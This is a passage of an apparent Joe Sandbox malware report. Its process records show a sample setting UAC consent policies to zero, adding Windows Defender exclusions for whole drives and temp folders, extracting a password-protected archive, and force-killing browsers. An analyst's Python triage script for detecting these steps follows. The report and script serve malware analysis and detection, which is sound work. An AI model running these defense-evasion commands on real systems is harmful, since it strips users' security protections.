                                                                                MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:14
                                                                                Start time:05:40:24
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\reg.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableVirtualization /t REG_DWORD /d 0 /f
                                                                                Imagebase:0x7ff758690000
                                                                                File size:77'312 bytes
                                                                                MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:15
                                                                                Start time:05:40:24
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\reg.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUwpStartupTasks /t REG_DWORD /d 0 /f
                                                                                Imagebase:0x7ff758690000
                                                                                File size:77'312 bytes
                                                                                MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:16
                                                                                Start time:05:40:24
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\reg.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableSecureUIAPaths /t REG_DWORD /d 0 /f
                                                                                Imagebase:0x7ff758690000
                                                                                File size:77'312 bytes
                                                                                MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:17
                                                                                Start time:05:40:24
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                Imagebase:0x7ff6eef20000
                                                                                File size:55'320 bytes
                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                Target ID:18
                                                                                Start time:05:40:24
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\reg.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableFullTrustStartupTasks /t REG_DWORD /d 0 /f
                                                                                Imagebase:0x7ff758690000
                                                                                File size:77'312 bytes
                                                                                MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:19
                                                                                Start time:05:40:25
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\reg.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableCursorSuppression /t REG_DWORD /d 0 /f
                                                                                Imagebase:0x7ff758690000
                                                                                File size:77'312 bytes
                                                                                MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:20
                                                                                Start time:05:40:25
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\reg.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DSCAutomationHostEnabled /t REG_DWORD /d 0 /f
                                                                                Imagebase:0x7ff758690000
                                                                                File size:77'312 bytes
                                                                                MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:22
                                                                                Start time:05:40:25
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\reg.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v dontdisplaylastusername /t REG_DWORD /d 0 /f
                                                                                Imagebase:0x7ff758690000
                                                                                File size:77'312 bytes
                                                                                MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:23
                                                                                Start time:05:40:25
                                                                                Start date:30/12/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1980,i,6972678540709667438,18385464693239191531,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff76e190000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:25
                                                                                Start time:05:40:27
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\reg.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f
                                                                                Imagebase:0x7ff758690000
                                                                                File size:77'312 bytes
                                                                                MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:26
                                                                                Start time:05:40:27
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\reg.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
                                                                                Imagebase:0x7ff758690000
                                                                                File size:77'312 bytes
                                                                                MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:27
                                                                                Start time:05:40:27
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:29
                                                                                Start time:05:40:31
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:PowerShell -Command "$dPath = [System.IO.Path]::Combine($Env:USERPROFILE, 'Downloads'); Add-MpPreference -ExclusionPath $dPath"
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:32
                                                                                Start time:05:40:33
                                                                                Start date:30/12/2024
                                                                                Path:C:\Program Files\7-Zip\7z.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\7-Zip\7z.exe" x "C:\Users\user\Downloads\DOC.zip" -o"C:\Users\user\Downloads" -pFuckSyrialAndFreePsAndFreeSyria00963
                                                                                Imagebase:0xbb0000
                                                                                File size:557'056 bytes
                                                                                MD5 hash:9A1DD1D96481D61934DCC2D568971D06
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:33
                                                                                Start time:05:40:33
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\timeout.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:timeout /t 9
                                                                                Imagebase:0x7ff69e930000
                                                                                File size:32'768 bytes
                                                                                MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:34
                                                                                Start time:05:40:33
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:PowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP\Startup'"
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:35
                                                                                Start time:05:40:36
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:PowerShell -Command "Add-MpPreference -ExclusionPath 'D:\'"
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:36
                                                                                Start time:05:40:38
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:PowerShell -Command "Add-MpPreference -ExclusionPath 'F:\'"
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:37
                                                                                Start time:05:40:40
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:PowerShell -Command "$tempPath = $Env:TEMP; Add-MpPreference -ExclusionPath $tempPath"
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:38
                                                                                Start time:05:40:42
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\taskkill.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:taskkill /F /IM chrome.exe
                                                                                Imagebase:0x7ff713750000
                                                                                File size:101'376 bytes
                                                                                MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:39
                                                                                Start time:05:40:42
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\taskkill.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:taskkill /F /IM firefox.exe
                                                                                Imagebase:0x7ff713750000
                                                                                File size:101'376 bytes
                                                                                MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:40
                                                                                Start time:05:40:42
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\taskkill.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:taskkill /F /IM msedge.exe
                                                                                Imagebase:0x7ff713750000
                                                                                File size:101'376 bytes
                                                                                MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:41
                                                                                Start time:05:40:42
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\taskkill.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:taskkill /F /IM iexplore.exe
                                                                                Imagebase:0x7ff713750000
                                                                                File size:101'376 bytes
                                                                                MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:42
                                                                                Start time:05:40:43
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\taskkill.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:taskkill /F /IM opera.exe
                                                                                Imagebase:0x7ff713750000
                                                                                File size:101'376 bytes
                                                                                MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:43
                                                                                Start time:05:40:43
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\taskkill.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:taskkill /F /IM safari.exe
                                                                                Imagebase:0x7ff713750000
                                                                                File size:101'376 bytes
                                                                                MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:44
                                                                                Start time:05:40:43
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\taskkill.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:taskkill /F /IM brave.exe
                                                                                Imagebase:0x7ff77bcc0000
                                                                                File size:101'376 bytes
                                                                                MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:45
                                                                                Start time:05:40:43
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\taskkill.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:taskkill /F /IM vivaldi.exe
                                                                                Imagebase:0x7ff713750000
                                                                                File size:101'376 bytes
                                                                                MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:46
                                                                                Start time:05:40:43
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\taskkill.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:taskkill /F /IM epic.exe
                                                                                Imagebase:0x7ff713750000
                                                                                File size:101'376 bytes
                                                                                MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:47
                                                                                Start time:05:40:43
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\taskkill.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:taskkill /F /IM yandex.exe
                                                                                Imagebase:0x7ff713750000
                                                                                File size:101'376 bytes
                                                                                MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:48
                                                                                Start time:05:40:44
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\taskkill.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:taskkill /F /IM tor.exe
                                                                                Imagebase:0x7ff713750000
                                                                                File size:101'376 bytes
                                                                                MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:49
                                                                                Start time:05:40:44
                                                                                Start date:30/12/2024
                                                                                Path:C:\Windows\System32\taskkill.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:taskkill /F /IM CMD.exe
                                                                                Imagebase:0x7ff713750000
                                                                                File size:101'376 bytes
                                                                                MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

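The records above show the sample building a blind spot before it touches the browsers: three `Add-MpPreference -ExclusionPath` calls (Targets 34 to 37) followed by a burst of `taskkill /F /IM` against every common browser process (Targets 38 to 48) and finally `CMD.exe` (Target 49). Two details matter when reading the exclusions. Target 34 wraps `$env:TEMP\Startup` in single quotes, and PowerShell does not expand variables inside single-quoted strings, so the exclusion registered is the literal text `$env:TEMP\Startup`, not the user's temp folder; Target 37 repeats the idea correctly by assigning `$Env:TEMP` to a variable and passing it unquoted. Targets 35 and 36 exclude entire drive letters (`D:\`, `F:\`), which is rarely legitimate. The script below is an added triage helper, not part of the Joe Sandbox report or of the sample: it parses the `Target ID / Start time / Commandline` record format shown above (re-typed here as a constructed subset), extracts each exclusion path together with its quoting pitfalls, and groups forced `taskkill` calls into bursts. The 5-second window and the minimum of three kills are assumptions chosen for this sample, not values from the report.

```python
"""Triage helpers for the process list of a Joe Sandbox report (added example)."""
import re

# Constructed subset of Targets 34..49 above, in the report's own record format
# (field set trimmed to what the checks need).
SAMPLE_REPORT = r"""
Target ID:34
Start time:05:40:33
Commandline:PowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP\Startup'"

Target ID:35
Start time:05:40:36
Commandline:PowerShell -Command "Add-MpPreference -ExclusionPath 'D:\'"

Target ID:37
Start time:05:40:40
Commandline:PowerShell -Command "$tempPath = $Env:TEMP; Add-MpPreference -ExclusionPath $tempPath"

Target ID:38
Start time:05:40:42
Commandline:taskkill /F /IM chrome.exe

Target ID:39
Start time:05:40:42
Commandline:taskkill /F /IM firefox.exe

Target ID:40
Start time:05:40:42
Commandline:taskkill /F /IM msedge.exe

Target ID:49
Start time:05:40:44
Commandline:taskkill /F /IM CMD.exe
"""

# Single-quoted, double-quoted or bare argument to -ExclusionPath.
EXCLUSION_RE = re.compile(
    r"""Add-MpPreference\s+-ExclusionPath\s+(?:'(?P<sq>[^']*)'|"(?P<dq>[^"]*)"|(?P<bare>[^\s;"]+))""",
    re.IGNORECASE,
)
TASKKILL_RE = re.compile(r"taskkill(?:\.exe)?\s+(?P<flags>.*?)/IM\s+(?P<image>\S+)", re.IGNORECASE)


def parse_process_records(text):
    """Split 'Key:Value' lines into one dict per 'Target ID' record."""
    records, current = [], {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        key, sep, value = line.partition(":")
        if not sep:
            continue
        if key == "Target ID" and current:
            records.append(current)
            current = {}
        current[key] = value.strip()
    if current:
        records.append(current)
    return records


def find_defender_exclusions(records):
    """Return every Add-MpPreference exclusion with the quoting pitfalls that matter."""
    hits = []
    for rec in records:
        for m in EXCLUSION_RE.finditer(rec.get("Commandline", "")):
            quoting = "single" if m.group("sq") is not None else "double" if m.group("dq") is not None else "bare"
            path = m.group("sq") if quoting == "single" else m.group("dq") if quoting == "double" else m.group("bare")
            hits.append({
                "target_id": rec["Target ID"],
                "path": path,
                # single quotes are literal in PowerShell: '$env:TEMP\Startup' is not expanded
                "unexpanded_variable": quoting == "single" and "$" in path,
                # a bare $name argument is expanded at run time (the Target 37 pattern)
                "variable_argument": quoting == "bare" and path.startswith("$"),
                "whole_drive": re.fullmatch(r"[A-Za-z]:\\?", path) is not None,
            })
    return hits


def _seconds(hms):
    h, m, s = (int(x) for x in hms.split(":"))
    return h * 3600 + m * 60 + s


def find_taskkill_bursts(records, window_seconds=5, min_count=3):
    """Group forced taskkill calls that start within window_seconds of each other."""
    kills = []
    for rec in records:
        m = TASKKILL_RE.search(rec.get("Commandline", ""))
        if m and "/f" in m.group("flags").lower():
            kills.append((_seconds(rec["Start time"]), int(rec["Target ID"]), m.group("image").lower()))
    kills.sort()
    bursts, i = [], 0
    while i < len(kills):
        j = i
        while j + 1 < len(kills) and kills[j + 1][0] - kills[i][0] <= window_seconds:
            j += 1
        if j - i + 1 >= min_count:
            bursts.append({"start": kills[i][0], "end": kills[j][0],
                           "targets": [k[1] for k in kills[i:j + 1]],
                           "images": [k[2] for k in kills[i:j + 1]]})
        i = j + 1
    return bursts


if __name__ == "__main__":
    recs = parse_process_records(SAMPLE_REPORT)
    for hit in find_defender_exclusions(recs):
        print("exclusion", hit)
    for burst in find_taskkill_bursts(recs):
        print("taskkill burst", burst)
```

On a live host the same two signals are worth checking directly: `Get-MpPreference | Select-Object -ExpandProperty ExclusionPath` lists what Defender is currently told to ignore, and a literal `$env:TEMP\Startup` entry or a bare drive letter in that list is a finding in its own right, independent of which sample put it there.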
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.1770059088.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_7ffd9b8c0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 900f0aaa8190166ecf9bc64d744b1123c0922bcebf7b75209ea915579a5f87c9
                                                                                  • Instruction ID: 34f718b38f9d0da04dc144c90c237ef1c1171b93bc7d2f096d3a3a38c1c9cfc3
                                                                                  • Opcode Fuzzy Hash: 900f0aaa8190166ecf9bc64d744b1123c0922bcebf7b75209ea915579a5f87c9
                                                                                  • Instruction Fuzzy Hash: 26612AB2B2FA8E0FF779A7A858711B876C2DF49694F4901BFD059C71E3ED09A9018241
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.1770059088.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_7ffd9b8c0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7dce25ea7aabd7630a08fec1b6e6f3ae0d6d5006df9efc27a5addde2fc811661
                                                                                  • Instruction ID: 2bc202ea4c85f77925373699ce64bbf48692376f2dd61841e0f6ee6d39b01a80
                                                                                  • Opcode Fuzzy Hash: 7dce25ea7aabd7630a08fec1b6e6f3ae0d6d5006df9efc27a5addde2fc811661
                                                                                  • Instruction Fuzzy Hash: 37212972F2FA8E0FE774B76814711B876C2DF48694B5A00BBD05DC71E3DD19AD018245
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.1769732662.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_7ffd9b7f0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 89cf490454d7bf4db362622e3d2b8a85fcc481bc01f27d3ca7e3566b79ed4113
                                                                                  • Instruction ID: f015c6d8f1291ae9f9a84129c24d6f916cfece872e45c549876b83854877da12
                                                                                  • Opcode Fuzzy Hash: 89cf490454d7bf4db362622e3d2b8a85fcc481bc01f27d3ca7e3566b79ed4113
                                                                                  • Instruction Fuzzy Hash: D001A73020CB0C4FD748EF0CE051AA5B7E0FF85360F10056DE58AC36A1DA32E882CB45